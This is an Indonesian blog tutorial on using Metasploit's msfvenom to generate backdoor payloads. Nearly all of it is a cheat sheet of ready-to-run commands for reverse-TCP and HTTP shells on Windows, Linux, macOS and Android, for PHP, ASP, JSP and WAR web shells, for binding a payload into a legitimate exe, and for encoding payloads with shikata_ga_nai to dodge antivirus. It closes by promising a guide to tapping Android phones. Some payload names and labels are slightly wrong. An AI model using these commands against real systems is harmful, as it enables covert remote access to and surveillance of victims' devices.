Cara menggunakan msfvenom
Oke pada artikel kali ini admin mau share pengalaman admin menggunakan metasploit, yaitu cara menggunakan msfvenom, nah jika belum tau apa itu msfvenom, kalian cari tau dulu deh di google yak. banyak kok artikel nya hehe...
Nah msfvenom sendiri adalah bagian khusus yang ada di metasploit loh gaes, msfvenom bertugas untuk melakukan pembuatan backdoor/pintu belakang, nah jika sudah dibuat, hacker akan menyuruh target untuk melakukan apa yang disuruh hacker tersebut.
perintah yang biasa kita gunakan seperti ini kira kira
"msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 R > shell.apk"
pengertian nya seperti berikut
Msfvenom = Untuk menjalankan program msfvenom metasploit
-p = Fungsi untuk Payload
android = Perangkat yang digunakan target
meterpreter = lokasi exploitasi
reverse_tcp = jenis exploitasi
LHOST = lokal host yang digunakan hacker
LPORT = port yang ingin digunakan hacker
R = path lokasi pembuatan payload
shell.apk = Nama payload
langsung saja cekidot dengan beberapa perintah perintah untuk membuat payload
| Perintah | Info |
|---|---|
| msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe | Creates a simple TCP Payload for Windows |
| msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe | Creates a simple HTTP Payload for Windows |
| msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf | Creates a simple TCP Shell for Linux |
| msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho | Creates a simple TCP Shell for Mac |
| msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk | Creats a simple TCP Payload for Android |
Web Payloads
| Perintah | Info |
|---|---|
| msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php | Creats a Simple TCP Shell for PHP |
| msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp | Creats a Simple TCP Shell for ASP |
| msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp | Creats a Simple TCP Shell for Javascript |
| msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war | Creats a Simple TCP Shell for WAR |
Windows Payloads
| Perintah | Info |
|---|---|
| msfvenom -l encoders | Lists all avalaible encoders |
| msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe | Binds an exe with a Payload (Backdoors an exe) |
| msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b ‘\x00’ -i 3 -f exe > example.exe | Creates a simple TCP payload with shikata_ga_nai encoder |
| msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe untuk artikel berikutnya, admin mau share cara menyadap perangkat android menggunakan metasploit. Terimakasih | Binds an exe with a Payload and encodes it |
Baca Juga





Posting Komentar
Posting Komentar